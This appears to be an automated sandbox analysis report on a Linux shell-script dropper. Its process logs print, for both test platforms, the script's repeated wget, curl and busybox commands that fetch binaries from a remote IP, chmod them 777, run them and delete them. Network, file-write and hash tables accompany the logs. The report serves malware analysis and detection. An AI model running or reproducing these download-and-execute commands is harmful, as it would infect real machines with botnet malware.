Analysis Overview
SHA256
7a530aad038bbecbf77ba76fbb1d21207ddaada0b487c2ec2ae30bb52e362c1a
Threat Level: Shows suspicious behavior
The file 2867f6118ccdde38169e7da22f50cedd.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 01:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 01:07
Reported
2024-11-21 01:09
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
28s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
Processes
/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.129.91:443 | | tcp |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 151.101.1.91:443 | ocp-ingress.fastly.gnome.org | tcp |
| GB | 89.187.167.8:443 | | tcp |
Files
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 01:07
Reported
2024-11-21 01:10
Platform
debian9-armhf-20240611-en
Max time kernel
49s
Max time network
88s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
Processes
/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
